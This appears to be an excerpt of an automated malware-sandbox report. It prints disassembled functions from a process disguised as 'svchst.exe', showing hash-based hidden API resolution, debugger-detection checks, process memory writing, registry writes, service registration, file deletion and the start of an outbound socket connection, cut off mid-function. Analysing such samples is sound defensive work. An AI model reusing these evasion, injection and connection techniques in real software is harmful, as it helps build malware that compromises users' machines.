0040DC30 mov eax, esi xrefs 0040DC90
0040DC32 mov dword ptr [ebp-00000320h], eax
0040DC38 mov eax, dword ptr [ebp-00000320h]
0040DC3E add eax, 04h
0040DC41 push eax
0040DC42 lea eax, dword ptr [edi+01h]
0040DC45 push eax
0040DC46 mov eax, dword ptr [ebp-00000314h]
0040DC4C push eax
0040DC4D call 0040CA04h
0040DC52 call 0040D7F4h
0040DC57 lea eax, dword ptr [ebp-0000030Ch]
0040DC5D push eax
0040DC5E lea eax, dword ptr [edi+01h]
0040DC61 push eax
0040DC62 mov eax, dword ptr [ebp-00000314h]
0040DC68 push eax
0040DC69 call 0040CA0Ch
0040DC6E call 0040D7F4h
0040DC73 mov eax, dword ptr [ebp-00000320h]
0040DC79 mov edx, dword ptr [ebp-0000030Ch]
0040DC7F sub edx, dword ptr [eax+04h]
0040DC82 inc edx
0040DC83 mov eax, dword ptr [ebp-00000320h]
0040DC89 mov dword ptr [eax], edx
0040DC8B inc edi
0040DC8C add esi, 08h
0040DC8F dec ebx
0040DC90 jne 0040DC30h
0040DC92 lea eax, dword ptr [ebp-00000300h] xrefs 0040DC25
0040DC98 push eax
0040DC99 mov eax, dword ptr [ebp-00000310h]
0040DC9F push eax
0040DCA0 push 0000000Ch
0040DCA2 call 0040C9FCh
0040DCA7 mov esi, eax
0040DCA9 test esi, esi
0040DCAB jne 0040DCB2h
0040DCAD call 0040D54Ch
0040DCB2 mov eax, dword ptr [ebp-00000304h] xrefs 0040DCAB
0040DCB8 call 0040DB0Ch
0040DCBD mov eax, dword ptr [ebp-00000304h]
0040DCC3 mov word ptr [eax], 200Ch
0040DCC8 mov eax, dword ptr [ebp-00000304h]
0040DCCE mov dword ptr [eax+08h], esi
0040DCD1 mov ebx, dword ptr [ebp-00000310h]
0040DCD7 dec ebx
0040DCD8 test ebx, ebx
0040DCDA jl 0040DCF6h
0040DCDC inc ebx
0040DCDD lea eax, dword ptr [ebp-000002FCh]
0040DCE3 lea edx, dword ptr [ebp-00000100h]
0040DCE9 mov ecx, dword ptr [eax] xrefs 0040DCF4
0040DCEB mov dword ptr [edx], ecx
0040DCED add edx, 04h
0040DCF0 add eax, 08h
0040DCF3 dec ebx
0040DCF4 jne 0040DCE9h
0040DCF6 push ebp xrefs 0040DCDA, 0040DD61
0040DCF7 mov ebx, dword ptr [ebp-00000310h]
0040DCFD dec ebx
0040DCFE mov eax, ebx
0040DD00 call 0040DB28h
0040DD05 pop ecx
0040DD06 test al, al
0040DD08 je 0040DD56h
0040DD0A lea eax, dword ptr [ebp-00000318h]
0040DD10 push eax
0040DD11 lea eax, dword ptr [ebp-00000100h]
0040DD17 push eax
0040DD18 mov eax, dword ptr [ebp-00000314h]
0040DD1E push eax
0040DD1F call 0040CA14h
0040DD24 call 0040D7F4h
0040DD29 lea eax, dword ptr [ebp-0000031Ch]
0040DD2F push eax
0040DD30 lea eax, dword ptr [ebp-00000100h]
0040DD36 push eax
0040DD37 push esi
0040DD38 call 0040CA14h
0040DD3D call 0040D7F4h
0040DD42 mov eax, dword ptr [ebp-00000318h]
0040DD48 mov edx, eax
0040DD4A mov eax, dword ptr [ebp-0000031Ch]
0040DD50 call dword ptr [ebp-00000308h]
0040DD56 push ebp xrefs 0040DD08
0040DD57 mov eax, ebx
0040DD59 call 0040DB58h
0040DD5E pop ecx
0040DD5F test al, al
0040DD61 jne 0040DCF6h
0040DD63 jmp 0040DD77h
0040DD65 push ebx xrefs 0040DBEC
0040DD66 mov eax, dword ptr [ebp-00000304h]
0040DD6C push eax
0040DD6D call 0040C5A8h 77124CFD@OLEAUT32.DLL (Import)
0040DD72 call 0040D7F4h
0040DD77 pop edi xrefs 0040DD63
0040DD78 pop esi
0040DD79 pop ebx
0040DD7A mov esp, ebp
0040DD7C pop ebp
0040DD7D ret function end
Function 00414314, API count: 7, instr count: 119
APIs
  • getprotobynumber.WS2_32, ref: 00414363
  • getservbyname.WS2_32, ref: 0041437D
  • htons.WS2_32, ref: 0041439C
  • getaddrinfo.WS2_32, ref: 0041440F
  • htons.WS2_32, ref: 00414433
  • htons.WS2_32, ref: 00414451
  • FreeAddrInfoW.WS2_32, ref: 00414472
Address Instruction Meta Information
00414314 push ebp xrefs 0041993D
00414315 mov ebp, esp
00414317 add esp, FFFFFFD4h
0041431A push ebx
0041431B push esi
0041431C mov ebx, ecx
0041431E mov esi, edx
00414320 mov dword ptr [ebp-04h], eax
00414323 mov eax, dword ptr [ebp-04h]
00414326 call 00404868h
0041432B xor eax, eax
0041432D push ebp
0041432E push 00414496h
00414333 push dword ptr fs:[eax]
00414336 mov dword ptr fs:[eax], esp
00414339 mov word ptr [ebp-06h], 0000h
0041433F mov eax, esi
00414341 call 00413B74h
00414346 test al, al
00414348 jne 004143C5h
0041434A mov eax, dword ptr [0042C8A4h] 00960A4C
0041434F call 00413914h
00414354 xor edx, edx
00414356 push ebp
00414357 push 004143BEh
0041435C push dword ptr fs:[edx]
0041435F mov dword ptr fs:[edx], esp
00414362 push ebx
00414363 call dword ptr [0042B3E0h] getprotobynumber@WS2_32.DLL (Hidden Import)
00414369 mov ebx, eax
0041436B xor eax, eax
0041436D test ebx, ebx
0041436F je 00414383h
00414371 mov eax, dword ptr [ebx]
00414373 push eax
00414374 mov eax, dword ptr [ebp-04h]
00414377 call 00404878h
0041437C push eax
0041437D call dword ptr [0042B3D4h] getservbyname@WS2_32.DLL (Hidden Import)
00414383 test eax, eax xrefs 0041436F
00414385 jne 00414397h
00414387 xor edx, edx
00414389 mov eax, dword ptr [ebp-04h]
0041438C call 00407608h
00414391 mov word ptr [ebp-06h], ax
00414395 jmp 004143A6h
00414397 mov ax, word ptr [eax+08h] xrefs 00414385
0041439B push eax
0041439C call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
004143A2 mov word ptr [ebp-06h], ax
004143A6 xor eax, eax xrefs 00414395
004143A8 pop edx
004143AA pop ecx Count = 2
004143AB mov dword ptr fs:[eax], edx
004143AE push 00414480h
004143B3 mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 004143C3
004143B8 call 0041391Ch
004143BD ret function end
004143C5 xor eax, eax xrefs 00414348
004143C7 mov dword ptr [ebp-0Ch], eax
004143CA xor edx, edx
004143CC push ebp
004143CD push 00414479h
004143D2 push dword ptr fs:[edx]
004143D5 mov dword ptr fs:[edx], esp
004143D8 lea eax, dword ptr [ebp-2Ch]
004143DB xor ecx, ecx
004143DD mov edx, 00000020h
004143E2 call 00403030h
004143E7 xor eax, eax
004143E9 mov dword ptr [ebp-28h], eax
004143EC mov eax, dword ptr [ebp+08h]
004143EF mov dword ptr [ebp-24h], eax
004143F2 mov dword ptr [ebp-20h], ebx
004143F5 mov dword ptr [ebp-2Ch], 00000001h
004143FC lea eax, dword ptr [ebp-0Ch]
004143FF push eax
00414400 lea eax, dword ptr [ebp-2Ch]
00414403 push eax
00414404 mov eax, dword ptr [ebp-04h]
00414407 call 00404878h
0041440C push eax
0041440D push 00000000h
0041440F call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00414415 test eax, eax
00414417 jne 0041445Bh
00414419 cmp dword ptr [ebp-0Ch], 00000000h
0041441D je 0041445Bh
0041441F mov eax, dword ptr [ebp-0Ch]
00414422 cmp dword ptr [eax+04h], 02h
00414426 jne 0041443Dh
00414428 mov eax, dword ptr [ebp-0Ch]
0041442B mov eax, dword ptr [eax+18h]
0041442E mov ax, word ptr [eax+02h]
00414432 push eax
00414433 call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
00414439 mov word ptr [ebp-06h], ax
0041443D mov eax, dword ptr [ebp-0Ch] xrefs 00414426
00414440 cmp dword ptr [eax+04h], 17h
00414444 jne 0041445Bh
00414446 mov eax, dword ptr [ebp-0Ch]
00414449 mov eax, dword ptr [eax+18h]
0041444C mov ax, word ptr [eax+02h]
00414450 push eax
00414451 call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
00414457 mov word ptr [ebp-06h], ax
0041445B xor eax, eax xrefs 00414417, 0041441D, 00414444
0041445D pop edx
0041445F pop ecx Count = 2
00414460 mov dword ptr fs:[eax], edx
00414463 push 00414480h
00414468 cmp dword ptr [ebp-0Ch], 00000000h xrefs 0041447E
0041446C je 00414478h
0041446E mov eax, dword ptr [ebp-0Ch]
00414471 push eax
00414472 call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414478 ret xrefs 0041446C function end
Function 00408D74, API count: 2, instr count: 100
APIs
  • GetThreadLocale.KERNEL32, ref: 00408DEC
  • GetDateFormatA.KERNEL32, ref: 00408DF2
Address Instruction Meta Information
00408D74 push ebp xrefs 004091A8
00408D75 mov ebp, esp
00408D77 add esp, FFFFFEE8h
00408D7D push ebx
00408D7E push esi
00408D7F xor ecx, ecx
00408D81 mov dword ptr [ebp-00000118h], ecx
00408D87 mov dword ptr [ebp-04h], ecx
00408D8A mov ebx, edx
00408D8C mov esi, eax
00408D8E xor eax, eax
00408D90 push ebp
00408D91 push 00408EC2h
00408D96 push dword ptr fs:[eax]
00408D99 mov dword ptr fs:[eax], esp
00408D9C mov eax, ebx
00408D9E call 004043DCh
00408DA3 mov eax, dword ptr [ebp+08h]
00408DA6 mov ax, word ptr [eax-0Eh]
00408DAA mov word ptr [ebp-14h], ax
00408DAE mov eax, dword ptr [ebp+08h]
00408DB1 mov ax, word ptr [eax-10h]
00408DB5 mov word ptr [ebp-12h], ax
00408DB9 mov eax, dword ptr [ebp+08h]
00408DBC mov ax, word ptr [eax-12h]
00408DC0 mov word ptr [ebp-0Eh], ax
00408DC4 lea eax, dword ptr [ebp-04h]
00408DC7 mov edx, 00408ED8h
00408DCC call 00404474h
00408DD1 push 00000100h
00408DD6 lea eax, dword ptr [ebp-00000114h]
00408DDC push eax
00408DDD mov eax, dword ptr [ebp-04h]
00408DE0 call 00404878h
00408DE5 push eax
00408DE6 lea eax, dword ptr [ebp-14h]
00408DE9 push eax
00408DEA push 00000004h
00408DEC call 004061ECh GetThreadLocale@KERNEL32.DLL (Hidden Import)
00408DF1 push eax
00408DF2 call 0040618Ch GetDateFormatA@KERNEL32.DLL (Hidden Import)
00408DF7 test eax, eax
00408DF9 je 00408EA1h
00408DFF mov eax, ebx
00408E01 lea edx, dword ptr [ebp-00000114h]
00408E07 mov ecx, 00000100h
00408E0C call 0040464Ch
00408E11 dec esi
00408E12 jne 00408EA1h
00408E18 mov eax, dword ptr [0042C73Ch] 00000009
00408E1D sub eax, 04h
00408E20 je 00408E44h
00408E22 sub eax, 0Dh
00408E25 jne 00408EA1h
00408E27 push ebx
00408E28 mov eax, dword ptr [ebx]
00408E2A mov edx, 00000001h
00408E2F call 0040B320h
00408E34 mov ecx, eax
00408E36 mov eax, dword ptr [ebx]
00408E38 mov edx, 00000001h
00408E3D call 004048D8h
00408E42 jmp 00408EA1h
00408E44 cmp dword ptr [0042C740h], 01h xrefs 00408E20
00408E4B jne 00408EA1h
00408E4D mov eax, dword ptr [ebx]
00408E4F call 00404678h
00408E54 mov edx, eax
00408E56 mov eax, dword ptr [ebx]
00408E58 call 0040B1ACh
00408E5D cmp eax, 04h
00408E60 jne 00408EA1h
00408E62 mov eax, dword ptr [ebx]
00408E64 mov edx, 00000003h
00408E69 call 0040B2BCh
00408E6E mov esi, eax
00408E70 lea eax, dword ptr [ebp-00000114h]
00408E76 add esi, eax
00408E78 dec esi
00408E79 lea eax, dword ptr [ebp-00000118h]
00408E7F mov edx, esi
00408E81 call 004045D4h
00408E86 mov eax, dword ptr [ebp-00000118h]
00408E8C mov edx, 00000002h
00408E91 call 0040B320h
00408E96 mov ecx, eax
00408E98 mov eax, ebx
00408E9A mov edx, esi
00408E9C call 004044CCh
00408EA1 xor eax, eax xrefs 00408DF9, 00408E12, 00408E4B, 00408E60, 00408E25, 00408E42
00408EA3 pop edx
00408EA5 pop ecx Count = 2
00408EA6 mov dword ptr fs:[eax], edx
00408EA9 push 00408EC9h
00408EAE lea eax, dword ptr [ebp-00000118h] xrefs 00408EC7
00408EB4 call 004043DCh
00408EB9 lea eax, dword ptr [ebp-04h]
00408EBC call 004043DCh
00408EC1 ret function end
Function 00429A0C, API count: 5, instr count: 53
APIs
  • RegisterServiceCtrlHandlerA.ADVAPI32, ref: 00429A4C
  • SetServiceStatus.ADVAPI32, ref: 00429A6E
  • CreateThread.KERNEL32, ref: 00429A89
  • WaitForSingleObject.KERNEL32, ref: 00429A9B
  • CloseHandle.KERNEL32, ref: 00429AA6
Address Instruction Meta Information
00429A0C push ebp
00429A0D mov ebp, esp
00429A0F push ecx
00429A10 push ebx
00429A11 mov ebx, 0042CAA4h
00429A16 mov dword ptr [ebx], 00000030h
00429A1C mov dword ptr [ebx+04h], 00000002h
00429A23 xor eax, eax
00429A25 mov dword ptr [ebx+08h], eax
00429A28 xor eax, eax
00429A2A mov dword ptr [ebx+0Ch], eax
00429A2D xor eax, eax
00429A2F mov dword ptr [ebx+10h], eax
00429A32 xor eax, eax
00429A34 mov dword ptr [ebx+14h], eax
00429A37 xor eax, eax
00429A39 mov dword ptr [ebx+18h], eax
00429A3C push 004299F0h
00429A41 mov eax, dword ptr [0042DA9Ch] 00000000
00429A46 call 00404878h
00429A4B push eax
00429A4C call 00421BBCh RegisterServiceCtrlHandlerA@ADVAPI32.DLL (Hidden Import)
00429A51 mov dword ptr [0042CAC0h], eax
00429A56 mov dword ptr [ebx+04h], 00000004h
00429A5D xor eax, eax
00429A5F mov dword ptr [ebx+14h], eax
00429A62 xor eax, eax
00429A64 mov dword ptr [ebx+18h], eax
00429A67 push ebx
00429A68 mov eax, dword ptr [0042CAC0h] 00000000
00429A6D push eax
00429A6E call 00421BB4h SetServiceStatus@ADVAPI32.DLL (Hidden Import)
00429A73 call 00422504h
00429A78 lea eax, dword ptr [ebp-04h]
00429A7B push eax
00429A7E push 00000000h Count = 2
00429A80 push 00429A04h
00429A87 push 00000000h Count = 2
00429A89 call 00421B8Ch CreateThread@KERNEL32.DLL (Hidden Import)
00429A8E mov dword ptr [0042CAA0h], eax
00429A93 push FFFFFFFFh
00429A95 mov eax, dword ptr [0042CAA0h] 00000000
00429A9A push eax
00429A9B call 00421B9Ch WaitForSingleObject@KERNEL32.DLL (Hidden Import)
00429AA0 mov eax, dword ptr [0042CAA0h] 00000000
00429AA5 push eax
00429AA6 call 00421BA4h CloseHandle@KERNEL32.DLL (Hidden Import)
00429AAB pop ebx
00429AAC pop ecx
00429AAD pop ebp
00429AAE retn 000Ch function end

Analysis Process: svchst.exe PID: 1508 Parent PID: 664

Executed Functions
Function 0041609B, API count: 1, instr count: 6
APIs
  • DeleteFileA.KERNEL32, ref: 0041609F
Address Instruction Meta Information
0041609B push dword ptr [esp+04h] xrefs 004155FD, 004154BA
0041609F call dword ptr [0040102Ch] DeleteFileA@KERNEL32.DLL (Import)
004160A5 neg eax
004160A7 sbb eax, eax
004160A9 inc eax
004160AA ret function end
Function 00414270, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • GetDriveTypeA.KERNEL32, ref: 00414286
Address Instruction Meta Information
00414270 push ebp xrefs 00415409, 00415500, 00415646, 00413EFE
00414271 mov ebp, esp
00414273 mov eax, dword ptr [ebp+08h]
00414276 push eax
00414277 push 6B5366BEh
0041427C push 399354CEh
00414281 call 00415E40h
00414286 call eax GetDriveTypeA@KERNEL32.DLL (Hidden Import)
00414288 pop ebp
00414289 retn 0004h function end
Function 00412190, API count: 0, instr count: 70
Strings
  • ntdll.dll, va: 0041215C
  • ZwQueryInformationProcess, va: 00412168
Address Instruction Meta Information
00412190 push ebp xrefs 00414897
00412191 mov ebp, esp
00412193 sub esp, 14h
00412196 mov dword ptr [ebp-08h], 00000000h
0041219D lea eax, dword ptr [ebp-08h]
004121A0 push eax
004121A1 push FFFFFFFFh
004121A3 call 00412250h
004121A8 cmp dword ptr [ebp-08h], 00000000h
004121AC je 004121B5h
004121AE mov al, 01h
004121B0 jmp 00412246h
004121B5 push 0041215Ch ASCII "ntdll.dll" xrefs 004121AC
004121BA call 00412270h
004121BF mov dword ptr [ebp-10h], eax
004121C2 cmp dword ptr [ebp-10h], 00000000h
004121C6 jne 004121CCh
004121C8 mov al, 01h
004121CA jmp 00412246h
004121CC push 00412168h ASCII "ZwQueryInformationProcess" xrefs 004121C6
004121D1 mov ecx, dword ptr [ebp-10h]
004121D4 push ecx
004121D5 call 00412290h
004121DA mov dword ptr [ebp-04h], eax
004121DD cmp dword ptr [ebp-04h], 00000000h
004121E1 jne 004121E7h
004121E3 mov al, 01h
004121E5 jmp 00412246h
004121E7 mov dword ptr [ebp-0Ch], 00000000h xrefs 004121E1
004121EE mov dword ptr [ebp-14h], 00000001h
004121F5 push 00000000h
004121F7 push 00000004h
004121F9 lea edx, dword ptr [ebp-0Ch]
004121FC push edx
004121FD push 00000007h
004121FF push FFFFFFFFh
00412201 call dword ptr [ebp-04h]
00412204 test eax, eax
00412206 jl 00412212h
00412208 cmp dword ptr [ebp-0Ch], 00000000h
0041220C je 00412212h
0041220E mov al, 01h
00412210 jmp 00412246h
00412212 push 00000000h xrefs 00412206, 0041220C
00412214 push 00000004h
00412216 lea eax, dword ptr [ebp-0Ch]
00412219 push eax
0041221A push 0000001Eh
0041221C push FFFFFFFFh
0041221E call dword ptr [ebp-04h]
00412221 test eax, eax
00412223 jne 00412229h
00412225 mov al, 01h
00412227 jmp 00412246h
00412229 push 00000000h xrefs 00412223
0041222B push 00000004h
0041222D lea ecx, dword ptr [ebp-14h]
00412230 push ecx
00412231 push 0000001Fh
00412233 push FFFFFFFFh
00412235 call dword ptr [ebp-04h]
00412238 test eax, eax
0041223A jl 00412246h
0041223C mov edx, dword ptr [ebp-14h]
0041223F and edx, 01h
00412242 jne 00412246h
00412244 mov al, 01h
00412246 mov esp, ebp xrefs 0041223A, 00412242, 00412227, 00412210, 004121E5, 004121CA, 004121B0
00412248 pop ebp
00412249 ret function end
Function 00414A70, API count: 1, instr count: 20
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegSetValueExA.ADVAPI32, ref: 00414A9A
Address Instruction Meta Information
00414A70 push ebp xrefs 004147BE
00414A71 mov ebp, esp
00414A73 mov eax, dword ptr [ebp+1Ch]
00414A76 push eax
00414A77 mov ecx, dword ptr [ebp+18h]
00414A7A push ecx
00414A7B mov edx, dword ptr [ebp+14h]
00414A7E push edx
00414A7F mov eax, dword ptr [ebp+10h]
00414A82 push eax
00414A83 mov ecx, dword ptr [ebp+0Ch]
00414A86 push ecx
00414A87 mov edx, dword ptr [ebp+08h]
00414A8A push edx
00414A8B push 647832FCh
00414A90 push 3E400FD6h
00414A95 call 00415E40h
00414A9A call eax RegSetValueExA@ADVAPI32.DLL (Hidden Import)
00414A9C pop ebp
00414A9D retn 0018h function end
Function 004162AF, API count: 1, instr count: 30
APIs
  • WriteFile.KERNEL32, ref: 004162D0
Address Instruction Meta Information
004162AF push ebp xrefs 004160EC
004162B0 mov ebp, esp
004162B2 mov eax, dword ptr [ebp+08h]
004162B5 push esi
004162B6 xor ecx, ecx
004162B8 xor esi, esi
004162BA cmp byte ptr [eax], cl
004162BC je 004162C4h
004162BE inc esi xrefs 004162C2
004162BF cmp byte ptr [esi+eax], cl
004162C2 jne 004162BEh
004162C4 push ecx xrefs 004162BC
004162C5 lea ecx, dword ptr [ebp+08h]
004162C8 push ecx
004162C9 push esi
004162CA push eax
004162CB mov eax, dword ptr [ebp+0Ch]
004162CE push dword ptr [eax]
004162D0 call dword ptr [0040100Ch] WriteFile@KERNEL32.DLL (Import)
004162D6 test eax, eax
004162D8 jne 004162DFh
004162DA or eax, FFFFFFFFh
004162DD jmp 004162E9h
004162DF mov eax, dword ptr [ebp+08h] xrefs 004162D8
004162E2 cmp eax, esi
004162E4 je 004162E9h
004162E6 or eax, FFFFFFFFh
004162E9 pop esi xrefs 004162E4, 004162DD
004162EA pop ebp
004162EB ret function end
Function 00414520, API count: 1, instr count: 18
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • WriteProcessMemory.KERNEL32, ref: 00414546
Address Instruction Meta Information
00414520 push ebp xrefs 00414343, 004143EB, 004143B4, 004152C8, 004152E6
00414521 mov ebp, esp
00414523 mov eax, dword ptr [ebp+18h]
00414526 push eax
00414527 mov ecx, dword ptr [ebp+14h]
0041452A push ecx
0041452B mov edx, dword ptr [ebp+10h]
0041452E push edx
0041452F mov eax, dword ptr [ebp+0Ch]
00414532 push eax
00414533 mov ecx, dword ptr [ebp+08h]
00414536 push ecx
00414537 push 6B5366BEh
0041453C push BEA0BF35h
00414541 call 00415E40h
00414546 call eax WriteProcessMemory@KERNEL32.DLL (Hidden Import)
00414548 pop ebp
00414549 retn 0014h function end
Function 004141E0, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • FindNextFileA.KERNEL32, ref: 004141FA
Address Instruction Meta Information
004141E0 push ebp xrefs 0041468B, 00413EB4
004141E1 mov ebp, esp
004141E3 mov eax, dword ptr [ebp+0Ch]
004141E6 push eax
004141E7 mov ecx, dword ptr [ebp+08h]
004141EA push ecx
004141EB push 6B5366BEh
004141F0 push 279DEAD7h
004141F5 call 00415E40h
004141FA call eax FindNextFileA@KERNEL32.DLL (Hidden Import)
004141FC pop ebp
004141FD retn 0008h function end
Function 004140F0, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • FindFirstFileA.KERNEL32, ref: 0041410A
Address Instruction Meta Information
004140F0 push ebp xrefs 0041465F, 00413D6C
004140F1 mov ebp, esp
004140F3 mov eax, dword ptr [ebp+0Ch]
004140F6 push eax
004140F7 mov ecx, dword ptr [ebp+08h]
004140FA push ecx
004140FB push 6B5366BEh
00414100 push 32432444h
00414105 call 00415E40h
0041410A call eax FindFirstFileA@KERNEL32.DLL (Hidden Import)
0041410C pop ebp
0041410D retn 0008h function end
Function 00414B50, API count: 1, instr count: 20
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateThread.KERNEL32, ref: 00414B7A
Address Instruction Meta Information
00414B50 push ebp xrefs 00414982, 00414996, 0041495A
00414B51 mov ebp, esp
00414B53 mov eax, dword ptr [ebp+1Ch]
00414B56 push eax
00414B57 mov ecx, dword ptr [ebp+18h]
00414B5A push ecx
00414B5B mov edx, dword ptr [ebp+14h]
00414B5E push edx
00414B5F mov eax, dword ptr [ebp+10h]
00414B62 push eax
00414B63 mov ecx, dword ptr [ebp+0Ch]
00414B66 push ecx
00414B67 mov edx, dword ptr [ebp+08h]
00414B6A push edx
00414B6B push 6B5366BEh
00414B70 push 6FB89AF0h
00414B75 call 00415E40h
00414B7A call eax CreateThread@KERNEL32.DLL (Hidden Import)
00414B7C pop ebp
00414B7D retn 0018h function end
Function 004144B0, API count: 1, instr count: 28
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateProcessA.KERNEL32, ref: 004144EA
Address Instruction Meta Information
004144B0 push ebp xrefs 00414300, 0041516E
004144B1 mov ebp, esp
004144B3 mov eax, dword ptr [ebp+2Ch]
004144B6 push eax
004144B7 mov ecx, dword ptr [ebp+28h]
004144BA push ecx
004144BB mov edx, dword ptr [ebp+24h]
004144BE push edx
004144BF mov eax, dword ptr [ebp+20h]
004144C2 push eax
004144C3 mov ecx, dword ptr [ebp+1Ch]
004144C6 push ecx
004144C7 mov edx, dword ptr [ebp+18h]
004144CA push edx
004144CB mov eax, dword ptr [ebp+14h]
004144CE push eax
004144CF mov ecx, dword ptr [ebp+10h]
004144D2 push ecx
004144D3 mov edx, dword ptr [ebp+0Ch]
004144D6 push edx
004144D7 mov eax, dword ptr [ebp+08h]
004144DA push eax
004144DB push 6B5366BEh
004144E0 push 46318AC7h
004144E5 call 00415E40h
004144EA call eax CreateProcessA@KERNEL32.DLL (Hidden Import)
004144EC pop ebp
004144ED retn 0028h function end
Function 00413FF0, API count: 1, instr count: 18
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • WriteFile.KERNEL32, ref: 00414016
Address Instruction Meta Information
00413FF0 push ebp xrefs 00414763, 00413CAA, 00413CCB, 00413CEE, 00413D0C, 00413A97
00413FF1 mov ebp, esp
00413FF3 mov eax, dword ptr [ebp+18h]
00413FF6 push eax
00413FF7 mov ecx, dword ptr [ebp+14h]
00413FFA push ecx
00413FFB mov edx, dword ptr [ebp+10h]
00413FFE push edx
00413FFF mov eax, dword ptr [ebp+0Ch]
00414002 push eax
00414003 mov ecx, dword ptr [ebp+08h]
00414006 push ecx
00414007 push 6B5366BEh
0041400C push 0F3FD1C3h
00414011 call 00415E40h
00414016 call eax WriteFile@KERNEL32.DLL (Import)
00414018 pop ebp
00414019 retn 0014h function end
Function 00416208, API count: 3, instr count: 72
APIs
    • HeapAlloc.KERNEL32, ref: 00415FFE
    • HeapFree.KERNEL32, ref: 004162F8
  • CloseHandle.KERNEL32, ref: 0041621C
  • CreateFileA.KERNEL32, ref: 00416288
  • SetFilePointer.KERNEL32, ref: 004162A1
Address Instruction Meta Information
00416208 push esi xrefs 004160B5
00416209 mov esi, dword ptr [esp+10h]
0041620D push edi
0041620E xor edi, edi
00416210 cmp esi, edi
00416212 je 0041624Ch
00416214 mov eax, dword ptr [esi]
00416216 cmp eax, FFFFFFFFh
00416219 je 00416222h
0041621B push eax
0041621C call dword ptr [00401004h] CloseHandle@KERNEL32.DLL (Import)
00416222 or dword ptr [esi], FFFFFFFFh xrefs 00416258, 00416219
00416225 or dword ptr [esi+04h], FFFFFFFFh
00416229 push ebx
0041622A mov ebx, dword ptr [esp+14h]
0041622E mov al, byte ptr [ebx]
00416230 cmp al, 61h
00416232 mov edx, C0000000h
00416237 je 00416270h
00416239 cmp al, 72h
0041623B je 00416267h
0041623D cmp al, 77h
0041623F je 0041625Eh
00416241 push esi xrefs 00416293
00416242 call 004162ECh
00416247 pop ecx
00416248 xor eax, eax
0041624A jmp 004162ABh
0041624C push 00000008h xrefs 00416212
0041624E call 00415FF2h
00416253 mov esi, eax
00416255 cmp esi, edi
00416257 pop ecx
00416258 jne 00416222h
0041625A xor eax, eax
0041625C jmp 004162ACh
0041625E mov eax, 40000000h xrefs 0041623F
00416263 push 00000002h
00416265 jmp 00416274h
00416267 mov eax, 80000000h xrefs 0041623B
0041626C push 00000003h
0041626E jmp 00416274h
00416270 mov eax, edx xrefs 00416237
00416272 push 00000004h
00416274 cmp byte ptr [ebx+01h], 0000002Bh xrefs 0041626E, 00416265
00416278 pop ecx
00416279 jne 0041627Dh
0041627B mov eax, edx
0041627E push edi Count = 2
0041627F push ecx
00416280 push edi
00416281 push 00000003h
00416283 push eax
00416284 push dword ptr [esp+28h]
00416288 call dword ptr [00401010h] CreateFileA@KERNEL32.DLL (Import)
0041628E mov edi, eax
00416290 cmp edi, FFFFFFFFh
00416293 je 00416241h
00416295 cmp byte ptr [ebx], 00000061h
00416298 jne 004162A7h
0041629A push 00000002h
0041629E push 00000000h Count = 2
004162A0 push edi
004162A1 call dword ptr [00401014h] SetFilePointer@KERNEL32.DLL (Import)
004162A7 mov dword ptr [esi], edi xrefs 00416298
004162A9 mov eax, esi
004162AB pop ebx xrefs 0041624A
004162AC pop edi xrefs 0041625C
004162AD pop esi
004162AE ret function end
Function 00414180, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • Sleep.KERNEL32, ref: 00414196
Address Instruction Meta Information
00414180 push ebp xrefs 004153DD, 00413E24
00414181 mov ebp, esp
00414183 mov eax, dword ptr [ebp+08h]
00414186 push eax
00414187 push 6B5366BEh
0041418C push 3D9972F5h
00414191 call 00415E40h
00414196 call eax Sleep@KERNEL32.DLL (Hidden Import)
00414198 pop ebp
00414199 retn 0004h function end
Function 00413F90, API count: 1, instr count: 22
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateFileA.KERNEL32, ref: 00413FBE
Address Instruction Meta Information
00413F90 push ebp xrefs 0041473E, 00414D07, 004139CC, 00413A2D, 00413A57
00413F91 mov ebp, esp
00413F93 mov eax, dword ptr [ebp+20h]
00413F96 push eax
00413F97 mov ecx, dword ptr [ebp+1Ch]
00413F9A push ecx
00413F9B mov edx, dword ptr [ebp+18h]
00413F9E push edx
00413F9F mov eax, dword ptr [ebp+14h]
00413FA2 push eax
00413FA3 mov ecx, dword ptr [ebp+10h]
00413FA6 push ecx
00413FA7 mov edx, dword ptr [ebp+0Ch]
00413FAA push edx
00413FAB mov eax, dword ptr [ebp+08h]
00413FAE push eax
00413FAF push 6B5366BEh
00413FB4 push 08F8F114h
00413FB9 call 00415E40h
00413FBE call eax CreateFileA@KERNEL32.DLL (Import)
00413FC0 pop ebp
00413FC1 retn 001Ch function end
Function 00414BA0, API count: 10, instr count: 62
APIs
  • WSAStartup.WS2_32, ref: 00414BB5
  • WSASocketA.WS2_32, ref: 00414BC7
  • WSACleanup.WS2_32, ref: 00414BDC
  • gethostbyname.WS2_32, ref: 00414BEE
  • WSACleanup.WS2_32, ref: 00414C03
  • htons.WS2_32, ref: 00414C10
  • inet_ntoa.WS2_32, ref: 00414C37
  • inet_addr.WS2_32, ref: 00414C3E
  • WSAConnect.WS2_32, ref: 00414C62
  • WSACleanup.WS2_32, ref: 00414C6D
Address Instruction Meta Information
00414BA0 push ebp xrefs 00414DF0
00414BA1 mov ebp, esp
00414BA3 sub esp, 000001A8h
00414BA9 lea eax, dword ptr [ebp-00000190h]
00414BAF push eax
00414BB0 push 00000202h
00414BB5 call dword ptr [00401048h] WSAStartup@WS2_32.DLL (Import)
00414BBF push 00000000h Count = 3
00414BC1 push 00000006h
00414BC3 push 00000001h
00414BC5 push 00000002h
